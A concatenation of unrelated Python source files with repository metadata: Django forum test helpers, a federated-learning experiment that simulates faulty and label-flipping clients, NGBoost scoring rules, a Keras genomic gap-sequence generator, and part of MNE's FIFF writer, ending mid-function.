] | 1 | 2022-01-09T19:53:55.000Z | 2022-01-09T19:53:55.000Z | spirit/core/tests/utils.py | igorshevk/oknoname | 0828504afb8fdae5f5e85040bec1d95cb27ce471 | [
"MIT"
] | 5 | 2021-06-08T21:03:58.000Z | 2022-03-12T00:18:43.000Z | spirit/core/tests/utils.py | BinaryTree0/fer3 | 85c3bbf2f328e69ad4d7c01b6e2c8d4ef1d9e0a3 | [
"MIT"
] | 1 | 2022-02-15T16:56:49.000Z | 2022-02-15T16:56:49.000Z | # -*- coding: utf-8 -*-
from django.contrib.auth import get_user_model
from django.core.cache import caches, cache
from ...core.conf import settings
from ...topic.models import Topic
from ...category.models import Category
from ...comment.models import Comment
from ...topic.private.models import TopicPrivate
User = get_user_model()
def create_user(**kwargs):
if 'username' not in kwargs:
kwargs['username'] = "user_foo%d" % User.objects.all().count()
if 'email' not in kwargs:
kwargs['email'] = "%s@bar.com" % kwargs['username']
if 'password' not in kwargs:
kwargs['password'] = "bar"
return User.objects.create_user(**kwargs)
def create_topic(category, **kwargs):
if 'user' not in kwargs:
kwargs['user'] = create_user()
if 'title' not in kwargs:
kwargs['title'] = "topic_foo%d" % Topic.objects.all().count()
return Topic.objects.create(category=category, **kwargs)
def create_private_topic(**kwargs):
assert 'category' not in kwargs, "do not pass category param"
category = Category.objects.get(pk=settings.ST_TOPIC_PRIVATE_CATEGORY_PK)
topic = create_topic(category=category, **kwargs)
return TopicPrivate.objects.create(topic=topic, user=topic.user)
def create_category(**kwargs):
if 'title' not in kwargs:
kwargs['title'] = "category_foo%d" % Category.objects.all().count()
if 'sort' not in kwargs:
kwargs['sort'] = Category.objects.all().count() + 1
return Category.objects.create(**kwargs)
def create_subcategory(category, **kwargs):
if 'title' not in kwargs:
kwargs['title'] = "subcategory_foo%d" % Category.objects.all().count()
return Category.objects.create(parent=category, **kwargs)
def create_comment(**kwargs):
if 'comment' not in kwargs:
kwargs['comment'] = "comment_foobar%d" % Comment.objects.all().count()
if 'comment_html' not in kwargs:
kwargs['comment_html'] = kwargs['comment']
if 'user' not in kwargs:
kwargs['user'] = create_user()
return Comment.objects.create(**kwargs)
def login(test_case_instance, user=None, password=None):
user = user or test_case_instance.user
password = password or "bar"
login_successful = test_case_instance.client.login(
username=user.username,
password=password)
test_case_instance.assertTrue(login_successful)
def cache_clear():
cache.clear() # Default one
for c in caches.all():
c.clear()
| 28.022472 | 78 | 0.677626 |
a9d1c8cd39193b1f1a77daa6269dff38eff2f75c | 15,764 | py | Python | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | 3 | 2021-06-24T12:27:26.000Z | 2022-03-28T02:30:04.000Z | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | null | null | null | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | 1 | 2021-11-29T20:18:18.000Z | 2021-11-29T20:18:18.000Z | from torch import optim
from utils.typings import BlockedLocations, Errors, FreeRiderAttack, PersonalisationMethod
from datasetLoaders.DatasetInterface import DatasetInterface
from experiment.CustomConfig import CustomConfig
import os
from typing import Callable, Dict, List, NewType, Optional, Tuple, Dict, Type
import json
from loguru import logger
from experiment.DefaultExperimentConfiguration import DefaultExperimentConfiguration
from datasetLoaders.MNIST import DatasetLoaderMNIST
from datasetLoaders.COVIDx import DatasetLoaderCOVIDx
from datasetLoaders.COVID19 import DatasetLoaderCOVID19
from datasetLoaders.Pneumonia import DatasetLoaderPneumonia
from classifiers import MNIST, CovidNet, CNN, Pneumonia
from logger import logPrint
from client import Client
import matplotlib.pyplot as plt
import numpy as np
import random
import torch
import time
import gc
from torch import cuda, Tensor, nn
from aggregators.Aggregator import Aggregator, allAggregators
from aggregators.AFA import AFAAggregator
from aggregators.FedMGDAPlusPlus import FedMGDAPlusPlusAggregator
from aggregators.FedAvg import FAAggregator
from aggregators.COMED import COMEDAggregator
from aggregators.Clustering import ClusteringAggregator
from aggregators.MKRUM import MKRUMAggregator
from aggregators.FedPADRC import FedPADRCAggregator
from aggregators.FedBE import FedBEAggregator
from aggregators.FedDF import FedDFAggregator
from aggregators.FedABE import FedABEAggregator
SEED = 0
# Colours used for graphing, add more if necessary
COLOURS: List[str] = [
"midnightblue",
"tab:blue",
"tab:orange",
"tab:green",
"tab:red",
"tab:cyan",
"tab:purple",
"tab:pink",
"tab:olive",
"tab:brown",
"tab:gray",
"chartreuse",
"lightcoral",
"saddlebrown",
"blueviolet",
"navy",
"cornflowerblue",
"thistle",
"dodgerblue",
"crimson",
"darkseagreen",
"maroon",
"mediumspringgreen",
"burlywood",
"olivedrab",
"linen",
"mediumorchid",
"teal",
"black",
"gold",
]
def __experimentOnMNIST(
config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
"""
MNIST Experiment with default settings
"""
dataLoader = DatasetLoaderMNIST().getDatasets
classifier = MNIST.Classifier
return __experimentSetup(config, dataLoader, classifier, title, filename, folder)
def __experimentOnCOVID19(
config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
"""
COVID19 Experiment with default settings
"""
dataLoader = DatasetLoaderCOVID19().getDatasets
classifier = CNN.Classifier
return __experimentSetup(config, dataLoader, classifier, title, filename, folder)
def __experimentOnCOVIDx(
config: DefaultExperimentConfiguration,
model="COVIDNet",
title="",
filename="",
folder="DEFAULT",
) -> Dict[str, Errors]:
"""
COVIDx Experiment with default settings
"""
datasetLoader = DatasetLoaderCOVIDx().getDatasets
if model == "COVIDNet":
classifier = CovidNet.Classifier
elif model == "resnet18":
classifier = CNN.Classifier
else:
raise Exception("Invalid Covid model name.")
return __experimentSetup(config, datasetLoader, classifier, title, filename, folder)
def __experimentOnPneumonia(
config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
"""
Pneumonia Experiment with extra settings in place to incorporate the necessary changes
"""
datasetLoader = DatasetLoaderPneumonia().getDatasets
classifier = Pneumonia.Classifier
# Each client now only has like 80-170 images so a batch size of 200 is pointless
config.batchSize = 30
config.labels = torch.tensor([0, 1])
config.Loss = nn.BCELoss
config.Optimizer = optim.RMSprop
return __experimentSetup(config, datasetLoader, classifier, title, filename, folder)
# def __experimentOnDiabetes(config: DefaultExperimentConfiguration):
# datasetLoader = DatasetLoaderDiabetes(
# config.requireDatasetAnonymization
# ).getDatasets
# classifier = Diabetes.Classifier
# __experimentSetup(config, datasetLoader, classifier)
# def __experimentOnHeartDisease(config: DefaultExperimentConfiguration):
# dataLoader = DatasetLoaderHeartDisease(
# config.requireDatasetAnonymization
# ).getDatasets
# classifier = HeartDisease.Classifier
# __experimentSetup(config, dataLoader, classifier)
def __experimentSetup(
config: DefaultExperimentConfiguration,
datasetLoader: Callable[
[Tensor, Tensor, Optional[Tuple[int, int]]], Tuple[List[DatasetInterface], DatasetInterface]
],
classifier,
title: str = "DEFAULT_TITLE",
filename: str = "DEFAULT_NAME",
folder: str = "DEFAULT_FOLDER",
) -> Dict[str, Errors]:
__setRandomSeeds()
gc.collect()
cuda.empty_cache()
errorsDict: Dict[str, Errors] = {}
blocked: Dict[str, BlockedLocations] = {}
for aggregator in config.aggregators:
name = aggregator.__name__.replace("Aggregator", "")
name = name.replace("Plus", "+")
logPrint("TRAINING {}".format(name))
if config.privacyPreserve is not None:
errors, block = __runExperiment(
config, datasetLoader, classifier, aggregator, config.privacyPreserve, folder
)
else:
errors, block = __runExperiment(
config, datasetLoader, classifier, aggregator, False, folder
)
logPrint("TRAINING {} with DP".format(name))
errors, block = __runExperiment(
config, datasetLoader, classifier, aggregator, True, folder
)
errorsDict[name] = errors.tolist()
blocked[name] = block
# Writing the blocked lists and errors to json files for later inspection.
if not os.path.isdir(folder):
os.makedirs(folder)
if not os.path.isdir(f"{folder}/json"):
os.mkdir(f"{folder}/json")
if not os.path.isdir(f"{folder}/graphs"):
os.mkdir(f"{folder}/graphs")
with open(f"{folder}/json/{filename} blocked.json", "w+") as outfile:
json.dump(blocked, outfile)
with open(f"{folder}/json/{filename} errors (Seed: {SEED}).json", "w+") as outfile:
json.dump(errorsDict, outfile)
# Plots the individual aggregator errors
if config.plotResults:
plt.figure()
i = 0
for name, err in errorsDict.items():
# plt.plot(err.numpy(), color=COLOURS[i])
plt.plot(err, color=COLOURS[i])
i += 1
plt.legend(errorsDict.keys())
plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
plt.ylabel("Error Rate (%)")
plt.title(title, loc="center", wrap=True)
plt.ylim(0, 1.0)
plt.savefig(f"{folder}/graphs/{filename}.png", dpi=400)
return errorsDict
def __runExperiment(
config: DefaultExperimentConfiguration,
datasetLoader: Callable[
[Tensor, Tensor, Optional[Tuple[int, int]]], Tuple[List[DatasetInterface], DatasetInterface]
],
classifier: nn.Module,
agg: Type[Aggregator],
useDifferentialPrivacy: bool,
folder: str = "test",
) -> Tuple[Errors, BlockedLocations]:
"""
Sets up the experiment to be run.
Initialises each aggregator appropriately
"""
serverDataSize = config.serverData
# if not (agg is FedBEAggregator or agg is FedDFAggregator or agg is FedABEAggregator):
if not agg.requiresData():
print("Type of agg:", type(agg))
print("agg:", agg)
serverDataSize = 0
trainDatasets, testDataset, serverDataset = datasetLoader(
config.percUsers,
config.labels,
config.datasetSize,
config.nonIID,
config.alphaDirichlet,
serverDataSize,
)
# TODO: Print client data partition, i.e. how many of each class they have. Plot it and put it in report.
clientPartitions = torch.stack([torch.bincount(t.labels, minlength=10) for t in trainDatasets])
logPrint(
f"Client data partition (alpha={config.alphaDirichlet}, percentage on server: {100*serverDataSize:.2f}%)"
)
# logPrint(f"Data per client: {clientPartitions.sum(dim=1)}")
logPrint(f"Number of samples per class for each client: \n{clientPartitions}")
clients = __initClients(config, trainDatasets, useDifferentialPrivacy)
# Requires model input size update due to dataset generalisation and categorisation
if config.requireDatasetAnonymization:
classifier.inputSize = testDataset.getInputSize()
model = classifier().to(config.aggregatorConfig.device)
name = agg.__name__.replace("Aggregator", "")
aggregator = agg(clients, model, config.aggregatorConfig)
if isinstance(aggregator, AFAAggregator):
aggregator.xi = config.aggregatorConfig.xi
aggregator.deltaXi = config.aggregatorConfig.deltaXi
elif isinstance(aggregator, FedMGDAPlusPlusAggregator):
aggregator.reinitialise(config.aggregatorConfig.innerLR)
elif isinstance(aggregator, FedPADRCAggregator) or isinstance(aggregator, ClusteringAggregator):
aggregator._init_aggregators(config.internalAggregator, config.externalAggregator)
# elif isinstance(aggregator, FedBEAggregator) or isinstance(aggregator, FedDFAggregator) or isinstance(aggregator, FedABEAggregator):
elif aggregator.requiresData():
serverDataset.data = serverDataset.data.to(aggregator.config.device)
serverDataset.labels = serverDataset.labels.to(aggregator.config.device)
aggregator.distillationData = serverDataset
errors: Errors = aggregator.trainAndTest(testDataset)
blocked = BlockedLocations(
{
"benign": aggregator.benignBlocked,
"malicious": aggregator.maliciousBlocked,
"faulty": aggregator.faultyBlocked,
"freeRider": aggregator.freeRidersBlocked,
}
)
# Plot mean and std values from the clients
if config.aggregatorConfig.detectFreeRiders:
if not os.path.exists(f"{folder}/std/{name}"):
os.makedirs(f"{folder}/std/{name}")
if not os.path.exists(f"{folder}/mean/{name}"):
os.makedirs(f"{folder}/mean/{name}")
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
for i in range(30):
if clients[i].free or clients[i].byz or clients[i].flip:
ax.plot(aggregator.means[i].detach().numpy(), color="red", label="free")
else:
ax.plot(aggregator.means[i].detach().numpy(), color="grey", label="normal")
handles, labels = ax.get_legend_handles_labels()
plt.legend([handles[1], handles[2]], [labels[1], labels[2]])
plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
plt.ylabel("Mean of Weights")
plt.title("Mean of Weights over Time", loc="center", wrap=True)
plt.xlim(0, 30)
plt.savefig(f"{folder}/mean/{name}/{config.name}.png")
# plt.show()
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
for i in range(30):
if clients[i].free or clients[i].byz or clients[i].flip:
ax.plot(aggregator.stds[i].detach().numpy(), color="red", label="free")
else:
ax.plot(aggregator.stds[i].detach().numpy(), color="grey", label="normal")
handles, labels = ax.get_legend_handles_labels()
plt.legend([handles[1], handles[2]], [labels[1], labels[2]])
plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
plt.ylabel("StD of Weights")
plt.title("Standard Deviation of Weights over Time", loc="center", wrap=True)
plt.xlim(0, 30)
plt.savefig(f"{folder}/std/{name}/{config.name}.png")
# plt.show()
return errors, blocked
def __initClients(
config: DefaultExperimentConfiguration,
trainDatasets: List[DatasetInterface],
useDifferentialPrivacy: bool,
) -> List[Client]:
"""
Initialises each client with their datasets, weights and whether they are not benign
"""
usersNo = config.percUsers.size(0)
p0 = 1 / usersNo
logPrint("Creating clients...")
clients: List[Client] = []
for i in range(usersNo):
clients.append(
Client(
idx=i,
trainDataset=trainDatasets[i],
epochs=config.epochs,
batchSize=config.batchSize,
learningRate=config.learningRate,
p=p0,
alpha=config.alpha,
beta=config.beta,
Loss=config.Loss,
Optimizer=config.Optimizer,
device=config.aggregatorConfig.device,
useDifferentialPrivacy=useDifferentialPrivacy,
epsilon1=config.epsilon1,
epsilon3=config.epsilon3,
needClip=config.needClip,
clipValue=config.clipValue,
needNormalization=config.needNormalization,
releaseProportion=config.releaseProportion,
)
)
nTrain = sum([client.n for client in clients])
# Weight the value of the update of each user according to the number of training data points
for client in clients:
client.p = client.n / nTrain
# Create malicious (byzantine) and faulty users
for client in clients:
if client.id in config.faulty:
client.byz = True
logPrint("User", client.id, "is faulty.")
if client.id in config.malicious:
client.flip = True
logPrint("User", client.id, "is malicious.")
client.trainDataset.zeroLabels()
if client.id in config.freeRiding:
client.free = True
logPrint("User", client.id, "is Free-Riding.")
return clients
def __setRandomSeeds(seed=SEED) -> None:
"""
Sets random seeds for all of the relevant modules.
Ensures consistent and deterministic results from experiments.
"""
print(f"Setting seeds to {seed}")
os.environ["PYTHONHASHSEED"] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
cuda.manual_seed(seed)
def experiment(exp: Callable[[], None]):
"""
Decorator for experiments so that time can be known and seeds can be set
Logger catch is set for better error catching and printing but is not necessary
"""
@logger.catch
def decorator():
__setRandomSeeds()
logPrint("Experiment {} began.".format(exp.__name__))
begin = time.time()
exp()
end = time.time()
logPrint("Experiment {} took {}".format(exp.__name__, end - begin))
return decorator
@experiment
def program() -> None:
"""
Main program for running the experiments that you want run.
"""
config = CustomConfig()
if (
FedPADRCAggregator in config.aggregators or FedMGDAPlusPlusAggregator in config.aggregators
) and config.aggregatorConfig.privacyAmplification:
print("Currently doesn't support both at the same time.")
print("Size of clients is very likely to be smaller than or very close to cluster_count.")
print(
"FedMGDA+ relies on every client being present and training at every federated round."
)
exit(-1)
errorsDict = {}
for attackName in config.scenario_conversion():
errors = __experimentOnMNIST(
config,
title=f"Basic CustomConfig Test \n Attack: {attackName}",
filename=f"{attackName}",
folder=f"test",
)
# Running the program here
program()
| 34.876106 | 138 | 0.66544 |
ea75cf2bae82bd5a8cf388363cec92729ee4c815 | 51 | py | Python | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | 1 | 2020-06-23T03:34:04.000Z | 2020-06-23T03:34:04.000Z | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | null | null | null | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | null | null | null | import fibonacci as f
print (__name__)
f.fib(20)
| 8.5 | 21 | 0.72549 |
4498f9936a9002fc6c6c6e44cf10a77d138cdcfd | 1,056 | py | Python | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | 1 | 2021-08-24T14:23:20.000Z | 2021-08-24T14:23:20.000Z | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | null | null | null | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from ngboost.helpers import Y_from_censored
class Score():
def total_score(self, Y, sample_weight=None):
return np.average(self.score(Y), weights=sample_weight)
def grad(self, Y, natural=True):
grad = self.d_score(Y)
if natural:
metric = self.metric()
grad = np.linalg.solve(metric, grad)
return grad
class LogScore(Score):
'''
Generic class for the log scoring rule.
The log scoring rule is the same as negative log-likelihood: -log(P̂(y)), also known as the maximum likelihood estimator. This scoring rule has a default method for calculating the Riemannian metric.
'''
def metric(self, n_mc_samples=100):
grads = np.stack([self.d_score(Y) for Y in self.sample(n_mc_samples)])
return np.mean(np.einsum('sik,sij->sijk', grads, grads), axis=0)
# autofit method from d_score?
MLE = LogScore
class CRPScore(Score):
'''
Generic class for the continuous ranked probability scoring rule.
'''
pass
CRPS = CRPScore | 32 | 203 | 0.667614 |
064a5c1ef1053bc4c87fd3d21ca301c8e4a21c2a | 5,547 | py | Python | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | """Keras Sequence that returns tuples of nucleotide sequences, one with multivariate synthetic gaps and the other without as ground truth."""
from typing import Union, Dict, Tuple
import pandas as pd
import numpy as np
from keras_bed_sequence import BedSequence
from keras_mixed_sequence.utils import NumpySequence
from .utils import generate_synthetic_gaps
from numba import types
from numba.typed import Dict
class MultivariateGapSequence(BedSequence):
"""
Keras Sequence that returns tuples of nucleotide sequences,
one with multivariate synthetic gaps and the other without as ground truth.
"""
def __init__(
self,
assembly: str,
bed: Union[pd.DataFrame, str],
gaps_mean: np.ndarray,
gaps_covariance: np.ndarray,
gaps_threshold: float = 0.4,
batch_size: int = 32,
verbose: bool = True,
seed: int = 42,
elapsed_epochs: int = 0,
genome_kwargs: Dict = None
):
"""Return new GapSequence object.
Parameters
----------------------------
assembly: str,
Genomic assembly from ucsc from which to extract sequences.
For instance, "hg19", "hg38" or "mm10".
bed: Union[pd.DataFrame, str],
Either path to file or Pandas DataFrame containing minimal bed columns,
like "chrom", "chromStart" and "chromEnd".
gaps_mean: np.ndarray,
Mean of the multivariate Gaussian distribution to use for generating
the gaps in the sequences. Length of the sequences must match with
length of the mean vector.
gaps_covariance: np.ndarray,
Covariance matrix of the multivariate Gaussian distribution to use
for generating the gaps in the sequences.
Length of the sequences must match with length of the mean vector.
gaps_threshold: float,
Threshold for casting the multivariate Gaussian distribution to
a binomial multivariate distribution.
batch_size: int = 32,
Batch size to be returned for each request.
By default is 32.
verbose: bool = True,
Whetever to show a loading bar.
seed: int = 42,
Starting seed to use if shuffling the dataset.
elapsed_epochs: int = 0,
Number of elapsed epochs to init state of generator.
genome_kwargs: Dict = None,
Parameters to pass to the Genome object.
Returns
--------------------
Return new GapSequence object.
"""
super().__init__(
assembly=assembly,
bed=bed,
batch_size=batch_size,
verbose=verbose,
seed=seed,
elapsed_epochs=elapsed_epochs,
genome_kwargs=genome_kwargs,
)
if len(gaps_mean) != self.window_length:
raise ValueError(
"Mean len({mean_len}) does not match bed file window len({window_len}).".format(
mean_len=len(gaps_mean),
window_len=self.window_length,
)
)
if len(gaps_covariance) != self.window_length:
raise ValueError(
"Covariance len({covariance_len}) does not match bed file window len({window_len}).".format(
covariance_len=len(gaps_covariance),
window_len=self.window_length,
)
)
gaps_coordinates = generate_synthetic_gaps(
gaps_mean,
gaps_covariance,
self.samples_number,
chunk_size=50000,
threshold=gaps_threshold,
seed=seed
)
gaps_dictionary = {}
for x, y in gaps_coordinates:
if x not in gaps_dictionary:
gaps_dictionary[x] = []
gaps_dictionary[x].append(y)
for key in gaps_dictionary:
gaps_dictionary[key] = np.array(gaps_dictionary[key], dtype=int)
self._cacheable_gaps_coordinates = gaps_dictionary
self._gaps_coordinates = None
# Rendering the starting gaps index, which
# will be shuffled alongside the bed file.
self._gaps_index = NumpySequence(
np.arange(self.samples_number, dtype=np.int),
batch_size=batch_size,
seed=seed,
elapsed_epochs=elapsed_epochs,
dtype=np.int
)
def _init_gaps_coordinates(self):
# Rendering the gaps coordinates
self._gaps_coordinates = Dict.empty(
key_type=types.int_,
value_type=types.int_[:],
)
self._gaps_coordinates.update(self._cacheable_gaps_coordinates)
def on_train_start(self, *args, **kwargs):
super().on_train_start()
self._init_gaps_coordinates()
@property
def batch_size(self) -> int:
"""Return batch size to be rendered."""
return self._batch_size
@batch_size.setter
def batch_size(self, batch_size: int):
"""Set batch size to given value."""
self._batch_size = batch_size
self._gaps_index.batch_size = batch_size
def on_epoch_end(self):
"""Shuffle private bed object on every epoch end."""
super().on_epoch_end()
self._gaps_index.on_epoch_end()
def __getitem__(self, idx):
if self._gaps_coordinates is None:
self._init_gaps_coordinates()
return super().__getitem__(idx)
| 36.019481 | 141 | 0.603209 |
e36729c52489f5b1ca441bd3a7ff4b7a0ed44a8e | 14,861 | py | Python | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | null | null | null | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | null | null | null | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | 1 | 2021-04-12T12:45:31.000Z | 2021-04-12T12:45:31.000Z | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from gzip import GzipFile
import os.path as op
import re
import time
import uuid
import numpy as np
from scipy import linalg, sparse
from .constants import FIFF
from ..utils import logger
from ..externals.jdcal import jcal2jd
from ..externals.six import string_types, b
def _write(fid, data, kind, data_size, FIFFT_TYPE, dtype):
"""Write data."""
if isinstance(data, np.ndarray):
data_size *= data.size
# XXX for string types the data size is used as
# computed in ``write_string``.
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_TYPE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(data, dtype=dtype).tostring())
def _get_split_size(split_size):
"""Convert human-readable bytes to machine-readable bytes."""
if isinstance(split_size, string_types):
exp = dict(MB=20, GB=30).get(split_size[-2:], None)
if exp is None:
raise ValueError('split_size has to end with either'
'"MB" or "GB"')
split_size = int(float(split_size[:-2]) * 2 ** exp)
if split_size > 2147483648:
raise ValueError('split_size cannot be larger than 2GB')
return split_size
def write_nop(fid, last=False):
"""Write a FIFF_NOP."""
fid.write(np.array(FIFF.FIFF_NOP, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_VOID, dtype='>i4').tostring())
fid.write(np.array(0, dtype='>i4').tostring())
next_ = FIFF.FIFFV_NEXT_NONE if last else FIFF.FIFFV_NEXT_SEQ
fid.write(np.array(next_, dtype='>i4').tostring())
def write_int(fid, kind, data):
"""Write a 32-bit integer tag to a fif file."""
data_size = 4
data = np.array(data, dtype='>i4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_INT, '>i4')
def write_double(fid, kind, data):
"""Write a double-precision floating point tag to a fif file."""
data_size = 8
data = np.array(data, dtype='>f8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DOUBLE, '>f8')
def write_float(fid, kind, data):
"""Write a single-precision floating point tag to a fif file."""
data_size = 4
data = np.array(data, dtype='>f4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_FLOAT, '>f4')
def write_dau_pack16(fid, kind, data):
"""Write a dau_pack16 tag to a fif file."""
data_size = 2
data = np.array(data, dtype='>i2').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DAU_PACK16, '>i2')
def write_complex64(fid, kind, data):
"""Write a 64 bit complex floating point tag to a fif file."""
data_size = 8
data = np.array(data, dtype='>c8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c8')
def write_complex128(fid, kind, data):
"""Write a 128 bit complex floating point tag to a fif file."""
data_size = 16
data = np.array(data, dtype='>c16').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c16')
def write_julian(fid, kind, data):
"""Write a Julian-formatted date to a FIF file."""
assert len(data) == 3
data_size = 4
jd = np.sum(jcal2jd(*data))
data = np.array(jd, dtype='>i4')
_write(fid, data, kind, data_size, FIFF.FIFFT_JULIAN, '>i4')
def write_string(fid, kind, data):
"""Write a string tag."""
str_data = data.encode('utf-8') # Use unicode or bytes depending on Py2/3
data_size = len(str_data) # therefore compute size here
my_dtype = '>a' # py2/3 compatible on writing -- don't ask me why
if data_size > 0:
_write(fid, str_data, kind, data_size, FIFF.FIFFT_STRING, my_dtype)
def write_name_list(fid, kind, data):
"""Write a colon-separated list of names.
Parameters
----------
data : list of strings
"""
write_string(fid, kind, ':'.join(data))
def write_float_matrix(fid, kind, mat):
"""Write a single-precision floating-point matrix tag."""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_FLOAT = FIFF.FIFFT_FLOAT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_FLOAT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f4').tostring())
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
check_fiff_length(fid)
def write_double_matrix(fid, kind, mat):
"""Write a double-precision floating-point matrix tag."""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_DOUBLE = FIFF.FIFFT_DOUBLE | FIFFT_MATRIX
data_size = 8 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_DOUBLE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f8').tostring())
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
check_fiff_length(fid)
def write_int_matrix(fid, kind, mat):
"""Write integer 32 matrix tag."""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_INT = FIFF.FIFFT_INT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * 3
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_INT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>i4').tostring())
dims = np.empty(3, dtype=np.int32)
dims[0] = mat.shape[1]
dims[1] = mat.shape[0]
dims[2] = 2
fid.write(np.array(dims, dtype='>i4').tostring())
check_fiff_length(fid)
def get_machid():
"""Get (mostly) unique machine ID.
Returns
-------
ids : array (length 2, int32)
The machine identifier used in MNE.
"""
mac = b('%012x' % uuid.getnode()) # byte conversion for Py3
mac = re.findall(b'..', mac) # split string
mac += [b'00', b'00'] # add two more fields
# Convert to integer in reverse-order (for some reason)
from codecs import encode
mac = b''.join([encode(h, 'hex_codec') for h in mac[::-1]])
ids = np.flipud(np.frombuffer(mac, np.int32, count=2))
return ids
def get_new_file_id():
"""Create a new file ID tag."""
secs, usecs = divmod(time.time(), 1.)
secs, usecs = int(secs), int(usecs * 1e6)
return {'machid': get_machid(), 'version': FIFF.FIFFC_VERSION,
'secs': secs, 'usecs': usecs}
def write_id(fid, kind, id_=None):
"""Write fiff id."""
id_ = _generate_meas_id() if id_ is None else id_
data_size = 5 * 4 # The id comprises five integers
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_ID_STRUCT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
# Collect the bits together for one write
arr = np.array([id_['version'],
id_['machid'][0], id_['machid'][1],
id_['secs'], id_['usecs']], dtype='>i4')
fid.write(arr.tostring())
def start_block(fid, kind):
"""Write a FIFF_BLOCK_START tag."""
write_int(fid, FIFF.FIFF_BLOCK_START, kind)
def end_block(fid, kind):
"""Write a FIFF_BLOCK_END tag."""
write_int(fid, FIFF.FIFF_BLOCK_END, kind)
def start_file(fname, id_=None):
"""Open a fif file for writing and writes the compulsory header tags.
Parameters
----------
fname : string | fid
The name of the file to open. It is recommended
that the name ends with .fif or .fif.gz. Can also be an
already opened file.
id_ : dict | None
ID to use for the FIFF_FILE_ID.
"""
if isinstance(fname, string_types):
if op.splitext(fname)[1].lower() == '.gz':
